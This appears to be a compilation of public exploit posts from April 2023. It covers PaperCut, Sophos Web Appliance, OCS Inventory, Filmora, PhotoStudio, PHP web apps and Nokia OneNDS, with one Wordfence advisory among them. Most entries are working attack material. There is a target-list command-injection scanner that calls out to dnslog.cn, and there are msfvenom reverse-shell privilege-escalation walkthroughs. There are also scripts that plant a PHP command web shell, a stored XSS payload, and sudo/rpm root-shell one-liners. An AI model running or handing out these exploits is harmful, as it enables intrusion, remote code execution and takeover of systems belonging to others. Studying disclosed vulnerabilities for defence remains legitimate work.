<pre><code># Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass<br /># Date: 21 April 2023<br /># Exploit Author: MaanVader<br /># Vendor Homepage: https://www.papercut.com/<br /># Version: 8.0 or later<br /># Tested on: 22.0.4<br /># CVE: CVE-2023-27350<br /><br />import requests<br />from bs4 import BeautifulSoup<br />import re<br /><br />def vuln_version():<br /> ip = input("Enter the ip address: ")<br /> url = "http://"+ip+":9191"+"/app?service=page/SetupCompleted"<br /> response = requests.get(url)<br /> soup = BeautifulSoup(response.text, 'html.parser')<br /> text_div = soup.find('div', class_='text')<br /> product_span = text_div.find('span', class_='product')<br /><br /> # Search for the first span element containing a version number<br /> version_span = None<br /> for span in text_div.find_all('span'):<br /> version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip())<br /> if version_match:<br /> version_span = span<br /> break<br /><br /> if version_span is None:<br /> print('Not Vulnerable')<br /> else:<br /> version_str = version_span.text.strip()<br /> print('Version:', version_str)<br /> print("Vulnerable version")<br /> print(f"Step 1 visit this url first in your browser: {url}")<br /> print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard")<br /><br /><br />if __name__ =="__main__":<br /> vuln_version()<br /> <br /><br /></code></pre>
<pre><code>#!/bin/bash <br /># Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection<br /># Exploit Author: Behnam Abasi Vanda<br /># Vendor Homepage: https://www.sophos.com<br /># Version: Sophos Web Appliance older than version 4.3.10.4<br /># Tested on: Ubuntu<br /># CVE : CVE-2023-1671<br /># Shodan Dork: title:"Sophos Web Appliance"<br /># Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce<br /># Reference : https://vulncheck.com/blog/cve-2023-1671-analysis<br /><br /><br /><br />TARGET_LIST="$1"<br /><br /># =====================<br />BOLD="\033[1m"<br />RED="\e[1;31m"<br />GREEN="\e[1;32m"<br />YELLOW="\e[1;33m"<br />BLUE="\e[1;34m"<br />NOR="\e[0m"<br /># ====================<br /><br /><br />get_new_subdomain()<br />{<br />cat MN.txt | grep 'YES' >/dev/null;ch=$?<br /> if [ $ch -eq 0 ];then<br /> echo -e " [+] Trying to get Subdomain $NOR"<br /> rm -rf cookie.txt<br /> sub=`curl -i -c cookie.txt -s -k -X $'GET' \<br /> -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \<br /> $'http://www.dnslog.cn/getdomain.php?t=0' | grep dnslog.cn` <br /> echo -e " [+]$BOLD$GREEN Subdomain : $sub $NOR"<br /> fi<br />}<br /><br />check_vuln()<br />{<br />curl -k --trace-ascii % "https://$1/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';ping $sub -c 3 #" | base64)"<br /><br />req=`curl -i -s -k -b cookie.txt -X $'GET' \<br /> -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \<br /> $'http://www.dnslog.cn/getrecords.php?t=0'`<br /> <br />echo "$req" | grep 'dnslog.cn' >/dev/null;ch=$?<br /> if [ $ch -eq 0 ];then<br /> echo "YES" > MN.txt<br /> echo -e " [+]$BOLD $RED https://$1 Vulnerable :D $NOR"<br /> echo "https://$1" >> vulnerable.lst <br /> else <br /> echo -e " [-] https://$1 Not Vulnerable :| $NOR"<br /> echo "NO" > MN.txt<br /> fi<br />}<br /><br />echo '<br /><br /> ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██████╗███████╗<br />██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ███║██╔════╝╚════██║<br />██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗╚██║███████╗ ██╔╝<br />██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝ ██║██╔═══██╗ ██╔╝ <br />╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║╚██████╔╝ ██║ <br /> ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝ ╚═════╝ ╚═╝ <br /> <br />██████╗ ██╗ ██╗ ██████╗ ███████╗██╗ ██╗███╗ ██╗ █████╗ ███╗ ███╗ ██╗ <br />██╔══██╗╚██╗ ██╔╝ ██╔══██╗██╔════╝██║ ██║████╗ ██║██╔══██╗████╗ ████║ ██╗╚██╗ <br />██████╔╝ ╚████╔╝ ██████╔╝█████╗ ███████║██╔██╗ ██║███████║██╔████╔██║ ╚═╝ ██║ <br />██╔══██╗ ╚██╔╝ ██╔══██╗██╔══╝ ██╔══██║██║╚██╗██║██╔══██║██║╚██╔╝██║ ▄█╗ ██║ <br />██████╔╝ ██║ ██████╔╝███████╗██║ ██║██║ ╚████║██║ ██║██║ ╚═╝ ██║ ▀═╝██╔╝ <br />╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ <br /> <br /> '<br />if test "$#" -ne 1; then<br /> echo " ----------------------------------------------------------------"<br /> echo " [!] please give the target list file : bash CVE-2023-1671.sh targets.txt "<br /> echo " ---------------------------------------------------------------"<br /> exit<br />fi<br /><br /><br /><br />rm -rf cookie.txt<br />echo "YES" > MN.txt<br />for target in `cat $TARGET_LIST`<br />do<br /><br />get_new_subdomain;<br />echo " [~] Checking $target"<br /> check_vuln "$target"<br />done<br />rm -rf MN.txt<br />rm -rf cookie.txt<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: Old Age Home Management System 1.0 - Multi<br /># Date: 4/26/2023<br /># Exploit Author: OR4NG.M4N<br /># Vendor Homepage: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/<br /># Software Link: https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip<br /># Version: v1.0<br /><br />you can delete any Details without login <br /><br />https://localhost/oahms/admin/manage-scdetails.php<br />https://localhost/oahms/admin/manage-services.php<br /><br />XSS Stored <br /><br />POST /oahms/contact.php<br />Host: localhost<br />User-Agent: Safari/123<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: ar,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 207<br />Origin: https://localhost<br />Connection: keep-alive<br />Referer: https://localhost/oahms/contact.php<br />Cookie: PHPSESSID=fvopdb793anmi5j89o8uad8seo<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />fname=<script>alert(or4ng)</script>&lname=<script>alert(or4ng)</script>&phone=6776767667&email=email@email.com&message=<script>alert(or4ng)</script>&submit=Submit <br /></code></pre>
<pre><code>#####################################################################<br /># #<br /># Exploit Title: OCS Inventory NG 2.3.0.0 - Unquoted Service Path #<br /># Date: 2023/04/21 #<br /># Exploit Author: msd0pe #<br /># Vendor Homepage: https://oscinventory-ng.org #<br /># Software Link: https://github.com/OCSInventory-NG/WindowsAgent #<br /># My Github: https://github.com/msd0pe-1 #<br /># Fixed in version 2.3.1.0 #<br /># #<br />#####################################################################<br /><br />OCS Inventory NG Windows Agent: <br />Versions below 2.3.1.0 contains an unquoted service path which allows attackers to escalate privileges to the system level.<br /><br />[1] Find the unquoted service path:<br /> > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """<br /><br /> OCS Inventory Service OCS Inventory Service C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe Auto<br /><br />[2] Get informations about the service:<br /> > sc qc "OCS Inventory Service"<br /><br /> [SC] QueryServiceConfig SUCCESS<br /><br /> SERVICE_NAME: OCS Inventory Service<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : OCS Inventory Service<br /> DEPENDENCIES : RpcSs<br /> : EventLog<br /> : Winmgmt<br /> : Tcpip<br /> SERVICE_START_NAME : LocalSystem<br /><br />[3] Generate a reverse shell:<br /> > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o OCS.exe<br /><br />[4] Upload the revese shell to C:\Program Files (x86)\OCS.exe<br /> > put OCS.exe<br /> > ls<br /> drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 .<br /> drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 ..<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Common Files<br /> -rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini<br /> drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer<br /> drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET<br /> drw-rw-rw- 0 Sat Apr 22 04:51:20 2023 OCS Inventory Agent<br /> -rw-rw-rw- 7168 Sat Apr 22 05:20:38 2023 OCS.exe<br /> drw-rw-rw- 0 Sat Apr 22 03:24:58 2023 Windows Defender<br /> drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Mail<br /> drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT<br /> drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell<br /><br />[5] Start listener<br /> > nc -lvp 4444<br /><br />[6] Reboot the service/server<br /> > sc stop "OCS Inventory Service"<br /> > sc start "OCS Inventory Service"<br /><br /> OR<br /><br /> > shutdown /r<br /><br />[7] Enjoy !<br /> 192.168.1.102: inverse host lookup failed: Unknown host<br /> connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309<br /> Microsoft Windows [Version 10.0.19045.2130]<br /> (c) Microsoft Corporation. All rights reserved.<br /><br /> C:\Windows\system32>whoami<br /><br /> nt authority\system<br /><br /></code></pre>
<pre><code>############################################################################<br /># #<br /># Exploit Title: Wondershare Filmora 12.2.9.2233 - Unquoted Service Path #<br /># Date: 2023/04/23 #<br /># Exploit Author: msd0pe #<br /># Vendor Homepage: https://www.wondershare.com #<br /># My Github: https://github.com/msd0pe-1 # <br /># # <br />############################################################################<br /><br />Wondershare Filmora:<br />Versions =< 12.2.9.2233 contains an unquoted service path which allows attackers to escalate privileges to the system level.<br /><br />[1] Find the unquoted service path:<br /> > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """<br /><br />Wondershare Native Push Service NativePushService C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe Auto<br /><br />[2] Get informations about the service:<br /> > sc qc "NativePushService"<br /><br /> [SC] QueryServiceConfig SUCCESS<br /><br /> SERVICE_NAME: NativePushService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Wondershare Native Push Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />[3] Generate a reverse shell:<br /> > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Wondershare.exe<br /><br />[4] Upload the reverse shell to C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare.exe<br /> > put Wondershare.exe<br /> > ls<br /> drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 .<br /> drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 ..<br /> drw-rw-rw- 0 Sun Apr 23 14:36:26 2023 Wondershare Filmora Update<br /> drw-rw-rw- 0 Sun Apr 23 14:37:13 2023 Wondershare NativePush<br /> -rw-rw-rw- 7168 Sun Apr 23 14:51:47 2023 Wondershare.exe<br /> drw-rw-rw- 0 Sun Apr 23 13:52:30 2023 WSHelper<br /><br /><br />[5] Start listener<br /> > nc -lvp 4444<br /><br />[6] Reboot the service/server<br /> > sc stop "NativePushService"<br /> > sc start "NativePushService"<br /><br /> OR<br /><br /> > shutdown /r<br /><br />[7] Enjoy !<br /> 192.168.1.102: inverse host lookup failed: Unknown host<br /> connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309<br /> Microsoft Windows [Version 10.0.19045.2130]<br /> (c) Microsoft Corporation. All rights reserved.<br /><br /> C:\Windows\system32>whoami<br /><br /> nt authority\system<br /><br /></code></pre>
<pre><code>##########################################################################<br /># #<br /># Exploit Title: Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path #<br /># Date: 2023/04/22 #<br /># Exploit Author: msd0pe #<br /># Vendor Homepage: https://www.arcsoft.com/ #<br /># My Github: https://github.com/msd0pe-1 #<br /># #<br />##########################################################################<br /><br />Arcsoft PhotoStudio:<br />Versions =< 6.0.0.172 contains an unquoted service path which allows attackers to escalate privileges to the system level.<br /><br />[1] Find the unquoted service path:<br /> > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """<br /><br /> ArcSoft Exchange Service ADExchange C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe Auto<br /><br />[2] Get informations about the service:<br /> > sc qc "ADExchange"<br /><br /> [SC] QueryServiceConfig SUCCESS<br /><br /> SERVICE_NAME: ADExchange<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 0 IGNORE<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : ArcSoft Exchange Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />[3] Generate a reverse shell:<br /> > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Common.exe<br /><br />[4] Upload the reverse shell to C:\Program Files (x86)\Common.exe<br /> > put Commom.exe<br /> > ls<br /> drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 .<br /> drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 ..<br /> drw-rw-rw- 0 Sun Apr 23 03:55:37 2023 ArcSoft<br /> drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 Common Files<br /> -rw-rw-rw- 7168 Sun Apr 23 04:10:25 2023 Common.exe<br /> -rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini<br /> drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 InstallShield Installation Information<br /> drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer<br /> drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET<br /> drw-rw-rw- 0 Sat Apr 22 05:48:20 2023 Windows Defender<br /> drw-rw-rw- 0 Sat Apr 22 05:46:44 2023 Windows Mail<br /> drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT<br /> drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar<br /> drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell<br /><br />[5] Start listener<br /> > nc -lvp 4444<br /><br />[6] Reboot the service/server<br /> > sc stop "ADExchange"<br /> > sc start "ADExchange"<br /><br /> OR<br /><br /> > shutdown /r<br /><br />[7] Enjoy !<br /> 192.168.1.102: inverse host lookup failed: Unknown host<br /> connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309<br /> Microsoft Windows [Version 10.0.19045.2130]<br /> (c) Microsoft Corporation. All rights reserved.<br /><br /> C:\Windows\system32>whoami<br /><br /> nt authority\system<br /><br /></code></pre>
<pre><code>Affected Plugin: Shield Security – Smart Bot Blocking & Intrusion Prevention <br /><br />Plugin Slug: wp-simple-firewall<br /><br />Affected Versions: <= 17.0.17<br /><br />CVE ID: CVE-2023-0992 <br /><br />CVSS Score: 7.2 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N <br /><br />Researcher/s: Ramuel Gall <br /><br />Fully Patched Version: 17.0.18<br /><br />The Shield Security plugin for WordPress is vulnerable to stored Cross-Site Scripting in versions up to, and including, 17.0.17 via the 'User-Agent' header. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.<br /><br />Description: Shield Security <= 17.0.17 - Missing Authorization <br /><br />Affected Plugin: Shield Security – Smart Bot Blocking & Intrusion Prevention <br /><br />Plugin Slug: wp-simple-firewall<br /><br />Affected Versions: <= 17.0.17<br /><br />CVE ID: CVE-2023-0993 <br /><br />CVSS Score: 4.3 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N <br /><br />Researcher/s: Ramuel Gall <br /><br />Fully Patched Version: 17.0.18<br /><br />The Shield Security plugin for WordPress is vulnerable to Missing Authorization on the 'theme-plugin-file' AJAX action in versions up to, and including, 17.0.17. This allows authenticated attackers to add arbitrary audit log entries indicating that a theme or plugin has been edited, and is also a vector for Cross-Site Scripting via CVE-2023-0992.<br /><br />Vulnerability Analysis<br /><br />The Shield Security plugin includes a number of features, including an audit log that records certain types of suspicious activity, such as plugin and theme installation, modification, post deletion, and other types of activity that might impact the site. While most of these events require authentication or higher privileges in order to trigger, we found that certain events could be triggered by unauthenticated users. In particular, failed attempts to authenticate using application passwords, new user registrations, and spam activity are among the actions recorded for unauthenticated users.<br /><br />The audit log records metadata about the client that performed the logged activity, including the client’s User-Agent, which can be accessed by clicking the “Meta” tag icon on an audit log entry. Unfortunately, the metadata was not escaped when it was output. While most of the metadata collected about a request has a very strict format and can only be spoofed to a limited extent, User-Agent strings are alphanumeric, and we were able to inject a script in an iframe in the User-Agent header that fired when an administrator viewed an event entry:<br /><br />shieldalert-1024x454 <br /><br />While this exploit does technically require user interaction, it can be considered “Passive” user interaction, that is, it does not require tricking the administrator into performing any actions they might not have performed otherwise. Depending on the payload used, an attacker could use the script executing in the administrator’s browser to create a new administrator account under their control. Additionally, this exploit can be automated, and can be exploited by unauthenticated attackers via a variety of vectors, at least one of which is likely to be present in most common site configurations. As such it earns its High severity rating.<br /><br />The second vulnerability was much lower in severity and consisted of a missing authorization check on the ‘edit-theme-plugin-file’ AJAX action, which is used to record edits to plugin or theme files. The primary consequence of this is that an authenticated attacker can spoof an audit log entry indicating that any file belonging to any plugin or theme on the site was edited. While this is primarily a nuisance, since it can be used to create audit log entries it is yet another vector to exploit the aforementioned Cross-Site Scripting vulnerability.<br /><br />Disclosure Timeline<br /><br />March 20, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability. We responsibly disclose the plugin to the developer, who responds quickly and releases a patch in version 17.0.18.<br /><br />April 19, 2023 – The firewall rule becomes available to all Wordfence users.<br /><br />Conclusion<br /><br />In today’s post, we detailed a High Severity Cross-Site Scripting vulnerability in Shield Security. We also detailed a lower-severity issue allowing authenticated attackers to spoof audit log entries indicating that plugin and theme files had been edited. These vulnerabilities have been fully patched in version 17.0.18.<br /><br />Wordfence Premium, Care, and Response users received a firewall rule to protect against any exploits targeting this vulnerability on March 20, 2023. Sites still using the free version of Wordfence received the same protection on April 19, 2023.<br /><br />If you know a friend or colleague who is using the Shield Security plugin on their site, we highly recommend forwarding this advisory to them as the Cross-Site Scripting vulnerability can allow Unauthenticated attackers to execute malicious JavaScript in an administrator’s browser, which can lead to site takeover.<br /><br />If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard. Thanks to Paul Goodchild from Shield Security for patching the issue quickly.<br /><br /></code></pre>
<pre><code># Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution (RCE)<br /># Date: 4/23/2023<br /># Author: Or4nG.M4n<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: windows<br />#<br /># Vuln File : SystemSettings.php < here you can inject php code<br /># if(isset($_POST['content'])){<br /># foreach($_POST['content'] as $k => $v)<br /># file_put_contents("../{$k}.html",$v); <=== put any code into welcome.html or whatever you want<br /># }<br /># Vuln File : home.php < here you can include and execute you're php code<br /># <h3 class="text-center">Welcome</h3><br /># <hr><br /># <div class="welcome-content"><br /># <?php include("welcome.html") ?> <=== include <br /># </div><br /># Perl Code <br />use LWP::UserAgent;<br />use LWP::Simple;<br /><br />print "Target Url #";<br />my $url = <STDIN>;<br />chomp $url;<br />$backdoor = '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'; <br />my $ua = LWP::UserAgent->new();<br />my $response = $ua->post( $url."/classes/SystemSettings.php?f=update_settings", { 'content[welcome]' => $backdoor } );<br />my $content = $response->decoded_content();<br />print "[+] injection in welcome page\n";<br />print "[+] backdoor url ".$url."/?cmd=ls -al";<br /><br /># Python Code<br /><br />import requests <br /><br />url = input("Enter url :")<br />postdata = {'content[welcome]':'<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'}<br />resp = requests.post(url+"/classes/SystemSettings.php?f=update_settings", postdata)<br />print("[+] injection in welcome page")<br />print("[+]"+url+"/?cmd=ls -al")<br />print("\n")<br /></code></pre>
<pre><code>===============================================================================<br /> title: Incorrect Permission Assignment<br /> product: Nokia OneNDS 20.9<br />vulnerability type: Security Misconfiguration<br /> severity: High<br /> CVSS Score: 7.8<br /> CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br /> found on: 04/05/2022<br /> by: Giacomo Sighinolfi <giacomosighinolfi@gmail.com><br /> cve: CVE-2022-30759<br />===============================================================================<br /><br />Some sudo permissions can be exploited by some users to escalate to root <br />privileges and execute arbitrary commands on the system.<br /><br />The affected users are:<br /> Provgw, notifs, dbmrun, (system users)<br />They can run as root the following script:<br /> /opt/cntdb/bin/noscripts_rpm.sh<br />It can be exploited with:<br /> sudo /opt/cntdb/bin/noscripts_rpm.sh force-erase <br /> "--eval '%{lua:os.execute(\"/bin/sh\")}'"<br /><br /><br />=============================================================================== <br /><br />Detailed analysis:<br /><br />The script accept as first argument one of the these options: <br /> install|update|fallback|erase|test-install|test-update|test-erase|<br /> force-install|force-update|force-erase <br />and as a second argument an arbitrary rpm package name.<br /><br />If we analyze the switch case code block (row 175) we can see how the first <br />argument influence the execution of the script.<br />175. case "$1" in<br />…<br />224. test-erase)<br />225. TEST_OPTION="--test"<br />226. OPTION="-e"<br />227. ;;<br />…<br />238. force-erase)<br />239. TEST_OPTION="--nodeps"<br />240. OPTION="-e"<br />241. ;;<br />…<br />Using “force-erase” or “test-erase” as the first argument, it creates “OPTION” <br />variable with “-e” as its value. That value allow us to trigger a privilege <br />escalation exploiting the rpm command (row 254) with a particular rpm package <br />name as second parameter passed to the script.<br />…<br />252. if [ $OPTION == "-e" ]<br />253. then<br />254. rpm $OPTION --noscripts $TEST_OPTION $2<br />…<br /><br />===============================================================================<br /></code></pre>
<pre><code>===============================================================================<br /> title: Incorrect Permission Assignment<br /> product: Nokia OneNDS 17<br />vulnerability type: Security Misconfiguration<br /> severity: High<br /> CVSS Score: 7.8<br /> CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br /> found on: 31/03/2022<br /> by: Giacomo Sighinolfi, Milena Mangiola, <br /> Savino Sisco, Valerio Casalino<br /> cve: CVE-2022-31244<br />===============================================================================<br /><br />Some sudo permissions can be exploited by the users that have specific roles<br />to escalate to root privileges and execute arbitrary commands on the system.<br /><br />The affected roles are:<br />ONENDS_CC_BASIC_ADMIN: <br /> - it can run /sbin/service <br /> - can be exploited using `sudo /sbin/service ../../bin/sh`<br />ONENDS_CC_SERVICE_ADMIN: <br /> - it can run /bin/rpm <br /> - can be exploited using `sudo /bin/rpm --eval '%{lua:os.execute("/bin/sh")}'`<br />ONENDS_CC_NETWORK_MANAGEMENT: <br /> - it can run /sbin/ip,/sbin/arp <br /> - can be exploited using `sudo /sbin/ip -force -batch 'file_to_read'`<br /> - can be exploited using `sudo /sbin/arp -v -f 'file_to_read'`<br /><br />===============================================================================<br /></code></pre>